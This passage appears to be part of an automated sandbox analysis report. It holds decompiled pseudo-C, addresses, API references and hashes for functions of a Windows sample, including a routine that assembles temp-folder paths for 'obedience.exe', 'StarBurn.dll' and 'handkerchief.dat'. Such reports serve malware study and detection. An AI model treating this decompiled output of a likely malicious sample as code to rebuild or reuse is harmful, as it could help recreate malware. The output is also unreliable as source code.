					E00AAB4AB(_t22);
				}
				 *((intOrPtr*)(_t36 + 4)) = 0;
				_v8 = 0xffffffff;
				_t23 = E00AC5B15(_t36);
				 *[fs:0x0] = _v16;
				return _t23;
			}














      0x009a2153
      0x009a2155
      0x009a2160
      0x009a2161
      0x009a2164
      0x009a216b
      0x009a216f
      0x009a2175
      0x009a2177
      0x009a217b
      0x009a2182
      0x009a2187
      0x009a218c
      0x009a2191
      0x009a2194
      0x009a2199
      0x009a2199
      0x009a219c
      0x009a219f
      0x009a21a4
      0x009a21a7
      0x009a21ac
      0x009a21ac
      0x009a21af
      0x009a21b2
      0x009a21b7
      0x009a21ba
      0x009a21bf
      0x009a21bf
      0x009a21c2
      0x009a21c5
      0x009a21ca
      0x009a21cd
      0x009a21d2
      0x009a21d7
      0x009a21da
      0x009a21e1
      0x009a21e9
      0x009a21f6

      APIs
      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 009A2182
        • Part of subcall function 00AC5C96: _setlocale.LIBCMT ref: 00AC5CA8
      • _free.LIBCMT ref: 009A2194
        • Part of subcall function 00AAB4AB: HeapFree.KERNEL32(00000000,00000000,?,00AAAEFC,?), ref: 00AAB4C1
        • Part of subcall function 00AAB4AB: GetLastError.KERNEL32(?,?,00AAAEFC,?), ref: 00AAB4D3
      • _free.LIBCMT ref: 009A21A7
      • _free.LIBCMT ref: 009A21BA
      • _free.LIBCMT ref: 009A21CD
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
      • String ID:
      • API String ID: 3515823920-0
      • Opcode ID: ee8c1c32445c7a29b2a9cf53aa7162c60deb41c849a7dac6dc6a9e742946b4ae
      • Instruction ID: 56fb97b41c96a473e1e4460693330d88968462b3bd63f5c1b11c0b0cb2c03694
      • Opcode Fuzzy Hash: ee8c1c32445c7a29b2a9cf53aa7162c60deb41c849a7dac6dc6a9e742946b4ae
      • Instruction Fuzzy Hash: 6511C1F1E04B009BD720DF5DD941A5BF7ECEB45720F144A2EE41AC3781E772E9408AA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A44B0 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 35sleepCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 009A3DF0: _memset.LIBCMT ref: 009A3E4A
        • Part of subcall function 009A3DF0: _memset.LIBCMT ref: 009A3E64
        • Part of subcall function 009A3DF0: _memset.LIBCMT ref: 009A3E7E
        • Part of subcall function 009A3DF0: _memset.LIBCMT ref: 009A3E98
        • Part of subcall function 009A3DF0: GetTempPathA.KERNEL32(00000104,00000000,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3EAC
        • Part of subcall function 009A3DF0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3EC6
        • Part of subcall function 009A3DF0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3ED6
        • Part of subcall function 009A3DF0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3EE6
        • Part of subcall function 009A3DF0: lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3EF6
        • Part of subcall function 009A3DF0: lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3F06
        • Part of subcall function 009A3DF0: lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3F16
      • Sleep.KERNELBASE(00000834,?,?,?), ref: 009A44E4
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _memset$lstrcatlstrcpy$PathSleepTemp
      • String ID: StarBurn.dll$handkerchief.dat$obedience.exe
      • API String ID: 1422132221-3572986091
      • Opcode ID: bee02ac2ff5a505218bd2b3c2729597db65b767ed7a43d4cde926c6c8c1b5994
      • Instruction ID: d12eea5d2409bd39b557e769e80caa08244c909e899cb8d2304da89332b3d07e
      • Opcode Fuzzy Hash: bee02ac2ff5a505218bd2b3c2729597db65b767ed7a43d4cde926c6c8c1b5994
      • Instruction Fuzzy Hash: D1E0EC752843497BDA04EA948C47FCE3358AB99F00F00884277965B2C1DDB0A90087B5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B151C Relevance: 4.6, APIs: 3, Instructions: 70registryCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009B151C(intOrPtr __ecx) {
				void* _v8;
				char _v12;
				int _v16;
				intOrPtr _v20;
				int _v24;
				long _t29;
				char* _t30;
				intOrPtr _t32;
				char** _t34;
				signed int _t39;
				char** _t43;
				char* _t45;

				 *((intOrPtr*)(__ecx + 0xa8)) = 0;
				_v20 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v24 = 4;
				_v16 = 0;
				_t34 = 0xd080a8;
				_t45 =  *0xd080a8; // 0xad8f10
				if(_t45 == 0) {
					L14:
					return 1;
				}
				do {
					_t29 = RegOpenKeyExA(0x80000001,  *_t34, 0, 1,  &_v8); // executed
					if(_t29 != 0) {
						goto L12;
					}
					_t8 =  &(_t34[1]); // 0xd080c8
					_t43 =  *_t8;
					while(1) {
						_t30 =  *_t43;
						if(_t30 == 0) {
							break;
						}
						if(RegQueryValueExA(_v8, _t30, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
							_t14 =  &(_t43[1]); // 0x1
							_t39 =  *_t14;
							_t32 = _v20;
							if(_v12 == 0) {
								 *(_t32 + 0xa8) =  *(_t32 + 0xa8) &  !_t39;
							} else {
								 *(_t32 + 0xa8) =  *(_t32 + 0xa8) | _t39;
							}
						}
						_v12 = 0;
						_v24 = 4;
						_v16 = 0;
						_t43 =  &(_t43[2]);
					}
					RegCloseKey(_v8);
					_v8 = 0;
					L12:
					_t34 =  &(_t34[2]);
				} while ( *_t34 != 0);
				goto L14;
			}















      0x009b1528
      0x009b152e
      0x009b1531
      0x009b1534
      0x009b1537
      0x009b153e
      0x009b1541
      0x009b1546
      0x009b154c
      0x009b15da
      0x009b15e0
      0x009b15e0
      0x009b1553
      0x009b1561
      0x009b1569
      0x00000000
      0x00000000
      0x009b156b
      0x009b156b
      0x009b15bc
      0x009b15bc
      0x009b15c0
      0x00000000
      0x00000000
      0x009b1589
      0x009b1591
      0x009b1591
      0x009b1594
      0x009b159a
      0x009b15a6
      0x009b159c
      0x009b159c
      0x009b159c
      0x009b159a
      0x009b15ac
      0x009b15af
      0x009b15b6
      0x009b15b9
      0x009b15b9
      0x009b15c5
      0x009b15cb
      0x009b15ce
      0x009b15ce
      0x009b15d1
      0x00000000

      APIs
      • RegOpenKeyExA.KERNELBASE(80000001,00D080A8,00000000,00000001,?), ref: 009B1561
      • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 009B1581
      • RegCloseKey.ADVAPI32(?), ref: 009B15C5
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CloseOpenQueryValue
      • String ID:
      • API String ID: 3677997916-0
      • Opcode ID: 54744c95bba16a1aeb9d889d649ff9fb95cccf6cd5c87ae060b3ed0a8be32fc5
      • Instruction ID: 191cf1c313ebe49dd2b3c082aa6129a5952d60bd84697ccb80876b0fbee31f54
      • Opcode Fuzzy Hash: 54744c95bba16a1aeb9d889d649ff9fb95cccf6cd5c87ae060b3ed0a8be32fc5
      • Instruction Fuzzy Hash: 1F213E71D10208EFDF21CF85C994AEEBBF8EF90315F6080AAE44AA6250D7B15A44CF61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B3452 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
      Download Yara Rule
      C-Code - Quality: 84%
      			E009B3452(void* __ecx, int _a4, CHAR* _a8, int _a12) {
				char _v8;
				int _v12;
				int _t14;
				void* _t15;
				long _t19;
				void* _t27;

				_push(__ecx);
				_push(__ecx);
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					_t14 = GetPrivateProfileIntA(_a4, _a8, _a12,  *(__ecx + 0x6c));
				} else {
					_t15 = E009B33F8(__ecx, _a4, 0); // executed
					_t27 = _t15;
					if(_t27 != 0) {
						_a4 = 4;
						_t19 = RegQueryValueExA(_t27, _a8, 0,  &_v12,  &_v8,  &_a4); // executed
						RegCloseKey(_t27);
						if(_t19 != 0) {
							goto L2;
						} else {
							_t14 = _v8;
						}
					} else {
						L2:
						_t14 = _a12;
					}
				}
				return _t14;
			}









      0x009b3457
      0x009b3458
      0x009b345e
      0x009b34b4
      0x009b3460
      0x009b3465
      0x009b346a
      0x009b346e
      0x009b3487
      0x009b348f
      0x009b3498
      0x009b34a1
      0x00000000
      0x009b34a3
      0x009b34a3
      0x009b34a3
      0x009b3470
      0x009b3470
      0x009b3470
      0x009b3470
      0x009b346e
      0x009b34bc

      APIs
      • RegQueryValueExA.KERNELBASE(00000000,?,00000000,?,?,?), ref: 009B348F
      • RegCloseKey.ADVAPI32(00000000), ref: 009B3498
      • GetPrivateProfileIntA.KERNEL32 ref: 009B34B4
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ClosePrivateProfileQueryValue
      • String ID:
      • API String ID: 1423431592-0
      • Opcode ID: a51b505580e592e4f8d4e7de2a5de35d401646c194bbf019f255131f032413a1
      • Instruction ID: 1afb22ecfaa783d2cc0c1fe484e6f1b55d92a0dde861d98a415a1c36f375ea4a
      • Opcode Fuzzy Hash: a51b505580e592e4f8d4e7de2a5de35d401646c194bbf019f255131f032413a1
      • Instruction Fuzzy Hash: DD011672101208FBDB12DF94CD44FDE7BAEEB04364F108016FA02AA120D775EA159B90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AA59B Relevance: 4.5, APIs: 3, Instructions: 35COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009AA59B(struct HWND__* _a4, int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _t9;
				signed int _t11;
				long _t20;

				_t9 = GetWindowLongA(_a4, _a8);
				_t20 =  !_a12 & _t9 | _a16;
				if(_t9 != _t20) {
					SetWindowLongA(_a4, _a8, _t20); // executed
					_t11 = _a20;
					if(_t11 != 0) {
						SetWindowPos(_a4, 0, 0, 0, 0, 0, _t11 | 0x00000017);
					}
					return 1;
				}
				return 0;
			}






      0x009aa5a6
      0x009aa5b3
      0x009aa5b8
      0x009aa5c5
      0x009aa5cb
      0x009aa5d2
      0x009aa5e0
      0x009aa5e0
      0x00000000
      0x009aa5e8
      0x00000000

      APIs
      • GetWindowLongA.USER32 ref: 009AA5A6
      • SetWindowLongA.USER32 ref: 009AA5C5
      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000200,?,009AA621,?,000000EC,?,00000020,00000000,?,009B0AF6), ref: 009AA5E0
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$Long
      • String ID:
      • API String ID: 847901565-0
      • Opcode ID: 30aef349642b12162d9b457012fabbf3f65747a2e384f7997abca806a7276af2
      • Instruction ID: c1a7c230a3d05869bc1146d876e2067a45c09872cb969562060a3f1f8c951dd3
      • Opcode Fuzzy Hash: 30aef349642b12162d9b457012fabbf3f65747a2e384f7997abca806a7276af2
      • Instruction Fuzzy Hash: BDF0307552000DBFDF099F60DC098BE3FA9EF09356B009429F817C5520DB31DD61EAA4
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A34B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 180COMMON
      Download Yara Rule
      C-Code - Quality: 78%
      			E009A34B0(signed int __ecx, signed int _a4) {
				signed int _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v44;
				signed int _v48;
				char _v51;
				signed int _v52;
				char _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t61;
				signed int _t62;
				signed int _t64;
				signed int _t66;
				signed int _t70;
				signed int _t72;
				void* _t77;
				signed int _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				signed int _t97;
				intOrPtr* _t102;
				signed int _t105;
				signed int _t106;
				intOrPtr _t111;
				signed int _t115;
				signed int _t119;
				intOrPtr _t120;
				signed int** _t124;
				signed int _t125;
				void* _t126;
				void* _t127;

				_push(0xffffffff);
				_push(0xac79f8);
				_push( *[fs:0x0]);
				_t127 = _t126 - 0x2c;
				_t61 =  *0xd0c910; // 0x3a0e8b0c
				_t62 = _t61 ^ _t125;
				_v20 = _t62;
				_push(_t62);
				 *[fs:0x0] =  &_v16;
				_t81 = _a4;
				_t64 = 0;
				_t119 = __ecx;
				if(_t81 == 0xffffffff) {
					L37:
					 *[fs:0x0] = _v16;
					_pop(_t111);
					_pop(_t120);
					_pop(_t82);
					return E00AAB46A(_t64, _t82, _v20 ^ _t125, _t104, _t111, _t120);
				}
				_t104 =  *( *(__ecx + 0x24));
				if(_t104 == 0) {
					L4:
					__eflags =  *((intOrPtr*)(_t119 + 0x54)) - _t64;
					if( *((intOrPtr*)(_t119 + 0x54)) == _t64) {
						L36:
						__eflags = _t64;
						goto L37;
					}
					_t104 =  *(_t119 + 0x10);
					_t112 = _t119 + 0x48;
					__eflags =  *_t104 - _t119 + 0x48;
					if( *_t104 == _t119 + 0x48) {
						_t112 =  *(_t119 + 0x3c);
						 *_t104 =  *(_t119 + 0x3c);
						 *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x20)))) =  *((intOrPtr*)(_t119 + 0x40));
						_t104 =  *(_t119 + 0x30);
						__eflags = 0;
						 *( *(_t119 + 0x30)) = 0;
					}
					__eflags =  *((intOrPtr*)(_t119 + 0x44)) - _t64;
					if(__eflags != 0) {
						_t105 = _t64;
						_v48 = _t64;
						_v52 = _t81;
						_v28 = 0xf;
						_v48 = _t105;
						_v44 = _t64;
						_v32 = 8;
						__eflags = 0xf - 0x10;
						if(0xf < 0x10) {
							_t105 =  &_v48;
						}
						 *(_t105 + 8) = _t64;
						_v8 = _t64;
						while(1) {
							L13:
							_t66 = _v48;
							_t83 = _v28;
							while(1) {
								_t106 = _t66;
								__eflags = _t83 - 0x10;
								if(_t83 < 0x10) {
									_t106 =  &_v48;
									_t66 = _t106;
								}
								_t104 =  &_v52;
								_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x44)))) + 0x14))))(_t119 + 0x4c,  &_v52,  &_v51,  &_v60, _t66, _t106 + _v32,  &_v56);
								__eflags = _t70;
								if(_t70 < 0) {
									break;
								}
								__eflags = _t70 - 1;
								if(_t70 > 1) {
									__eflags = _t70 - 3;
									if(__eflags != 0) {
										break;
									}
									_t72 = E009A2850(__eflags, _v52,  *((intOrPtr*)(_t119 + 0x54)));
									__eflags = _t72;
									if(_t72 == 0) {
										E009A27D0( &_v48);
										_t64 = _t119 | 0xffffffff;
									} else {
										E009A27D0( &_v48);
										_t64 = _a4;
									}
									goto L37;
								}
								_t83 = _v28;
								_t66 = _v48;
								_t97 = _t66;
								__eflags = _t83 - 0x10;
								if(_t83 < 0x10) {
									_t97 =  &_v48;
								}
								_t115 = _v56 - _t97;
								__eflags = _t115;
								if(_t115 == 0) {
									L25:
									_t104 =  &_v52;
									 *((char*)(_t119 + 0x49)) = 1;
									__eflags = _v60 -  &_v52;
									if(_v60 !=  &_v52) {
										E009A27D0( &_v48);
										_t64 = _a4;
										goto L37;
									}
									__eflags = _t115;
									if(_t115 != 0) {
										continue;
									}
									__eflags = _v32 - 0x20;
									_t93 =  &_v48;
									if(_v32 >= 0x20) {
										L35:
										_t64 = E009A27D0(_t93);
										goto L36;
									}
									E009A2E10( &_v48, 8, _t115);
									goto L13;
								} else {
									__eflags = _t83 - 0x10;
									if(__eflags < 0) {
										_t66 =  &_v48;
									}
									_push( *((intOrPtr*)(_t119 + 0x54)));
									_push(_t115);
									_push(1);
									_push(_t66);
									_t77 = E00AAC61A(_t83, _t104, _t115, _t119, __eflags);
									_t127 = _t127 + 0x10;
									__eflags = _t115 - _t77;
									if(_t115 != _t77) {
										break;
									} else {
										_t83 = _v28;
										_t66 = _v48;
										goto L25;
									}
								}
							}
							_t93 =  &_v48;
							goto L35;
						}
					} else {
						_push( *((intOrPtr*)(_t119 + 0x54)));
						_push(_t81); // executed
						_t64 = E00AABD75(_t81, _t112,  *((intOrPtr*)(_t119 + 0x54)), __eflags); // executed
						__eflags = _t64 - 0xffffffff;
						if(_t64 == 0xffffffff) {
							goto L36;
						}
						_t64 = _t81;
						goto L37;
					}
				}
				_t102 =  *((intOrPtr*)(__ecx + 0x34));
				if(_t104 >=  *_t102 + _t104) {
					goto L4;
				}
				 *_t102 =  *_t102 - 1;
				_t124 =  *(__ecx + 0x24);
				_t7 =  &(( *_t124)[0]); // 0x1
				 *_t124 = _t7;
				 *( *_t124) = _t81;
				_t64 = _t81;
				goto L37;
			}








































      0x009a34b3
      0x009a34b5
      0x009a34c0
      0x009a34c1
      0x009a34c4
      0x009a34c9
      0x009a34cb
      0x009a34d1
      0x009a34d5
      0x009a34db
      0x009a34de
      0x009a34e0
      0x009a34e5
      0x009a367f
      0x009a3682
      0x009a368a
      0x009a368b
      0x009a368c
      0x009a369a
      0x009a369a
      0x009a34ee
      0x009a34f2
      0x009a3514
      0x009a3514
      0x009a3517
      0x009a367c
      0x009a367c
      0x00000000
      0x009a367c
      0x009a351d
      0x009a3520
      0x009a3523
      0x009a3525
      0x009a352a
      0x009a352d
      0x009a3532
      0x009a3534
      0x009a3537
      0x009a3539
      0x009a3539
      0x009a353b
      0x009a353e
      0x009a3565
      0x009a3567
      0x009a356a
      0x009a356d
      0x009a3570
      0x009a3573
      0x009a3576
      0x009a357d
      0x009a3580
      0x009a3582
      0x009a3582
      0x009a3585
      0x009a3588
      0x009a358b
      0x009a358b
      0x009a358b
      0x009a358e
      0x009a3591
      0x009a3591
      0x009a3593
      0x009a3596
      0x009a3598
      0x009a359b
      0x009a359b
      0x009a35b3
      0x009a35be
      0x009a35c0
      0x009a35c2
      0x00000000
      0x00000000
      0x009a35c8
      0x009a35cb
      0x009a3630
      0x009a3633
      0x00000000
      0x00000000
      0x009a363d
      0x009a3645
      0x009a3647
      0x009a365e
      0x009a3663
      0x009a3649
      0x009a364f
      0x009a3654
      0x009a3654
      0x00000000
      0x009a3647
      0x009a35cd
      0x009a35d0
      0x009a35d3
      0x009a35d5
      0x009a35d8
      0x009a35da
      0x009a35da
      0x009a35e0
      0x009a35e0
      0x009a35e2
      0x009a3606
      0x009a3606
      0x009a3609
      0x009a360d
      0x009a3610
      0x009a366a
      0x009a366f
      0x00000000
      0x009a366f
      0x009a3612
      0x009a3614
      0x00000000
      0x00000000
      0x009a361a
      0x009a361e
      0x009a3621
      0x009a3677
      0x009a3677
      0x00000000
      0x009a3677
      0x009a3626
      0x00000000
      0x009a35e4
      0x009a35e4
      0x009a35e7
      0x009a35e9
      0x009a35e9
      0x009a35ef
      0x009a35f0
      0x009a35f1
      0x009a35f3
      0x009a35f4
      0x009a35f9
      0x009a35fc
      0x009a35fe
      0x00000000
      0x009a3600
      0x009a3600
      0x009a3603
      0x00000000
      0x009a3603
      0x009a35fe
      0x009a35e2
      0x009a3674
      0x00000000
      0x009a3674
      0x009a3540
      0x009a3546
      0x009a3547
      0x009a3548
      0x009a3550
      0x009a3553
      0x00000000
      0x00000000
      0x009a3559
      0x00000000
      0x009a3559
      0x009a353e
      0x009a34f4
      0x009a34fd
      0x00000000
      0x00000000
      0x009a34ff
      0x009a3501
      0x009a3506
      0x009a3509
      0x009a350b
      0x009a350d
      0x00000000

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _fputc
      • String ID:
      • API String ID: 4236582747-3916222277
      • Opcode ID: 4bc22111920c1b9670d08875e242db19e5dae56e591633cdb856a3e860486c3a
      • Instruction ID: 6354a43e6526c2f171453fa5359053cca3845e378d40e279dc2b935d4333db08
      • Opcode Fuzzy Hash: 4bc22111920c1b9670d08875e242db19e5dae56e591633cdb856a3e860486c3a
      • Instruction Fuzzy Hash: 47615071E006099FCB14CF6CC4819AEF7B5FB5A310F548A1AF856A7781D731AA44CFA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B39FE Relevance: 3.1, APIs: 2, Instructions: 117windowCOMMON
      Download Yara Rule
      C-Code - Quality: 84%
      			E009B39FE(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t44;
				intOrPtr _t65;
				intOrPtr* _t68;
				void* _t69;

				_push(4);
				E00AAD232(0xac8347, __ebx, __edi, __esi);
				_t68 = __ecx;
				_t65 =  *((intOrPtr*)(_t69 + 8));
				_t44 =  *(_t65 + 0x14);
				 *((intOrPtr*)(_t69 - 0x10)) = 1;
				if(_t44 > 8) {
					L27:
					return E00AAD30A( *((intOrPtr*)(_t69 - 0x10)));
				}
				switch( *((intOrPtr*)(_t44 * 4 +  &M009B3B8A))) {
					case 0:
						L3:
						_t51 = E009BD77F(_t56, _t66, _t68, _t72);
						_push(0);
						_push(0);
						_push(0);
						_push(0xe100);
						if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) + 0xc))() == 0) {
							E009B5102(_t68);
						}
						if( *((intOrPtr*)(_t68 + 0x20)) != 0) {
							goto L27;
						}
						goto L6;
					case 1:
						__edi =  *(__edi + 0x18);
						__eax =  *__esi;
						_push(__edi);
						__eax =  *((intOrPtr*)( *__esi + 0xa4))();
						__eflags = __eax;
						if(__eax == 0) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) & __eax;
						}
						goto L27;
					case 2:
						__edx =  *__esi;
						__ebx = 0;
						__esi[0x13] = 0;
						__eax =  *(__edi + 0x18);
						_push( *(__edi + 0x18));
						__eax =  *((intOrPtr*)( *__esi + 0xa4))();
						__eflags = __eax;
						if(__eax != 0) {
							__eax = __esi[8];
							__esi[0x25] = __edi;
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E009B8782(__ecx);
							}
							__eax = SendMessageA( *(__eax + 0x20), 0x111, 0xe108, __ebx);
							__esi[0x25] = __ebx;
						}
						L6:
						 *((intOrPtr*)(_t69 - 0x10)) = 0;
						goto L27;
					case 3:
						goto L27;
					case 4:
						__eax = __esi[0x13];
						__esi[0x13] = __esi[0x13] & 0x00000000;
						__esi[0x25] = __eax;
						goto L27;
					case 5:
						__eax =  *__esi;
						__eax =  *((intOrPtr*)( *__esi + 0x98))();
						__ebx = 0;
						 *(__ebp - 0x10) = 0;
						__eflags = __esi[0x25];
						if(__eflags != 0) {
							goto L27;
						}
						__ecx = E009A6291(__eflags, 0x2c);
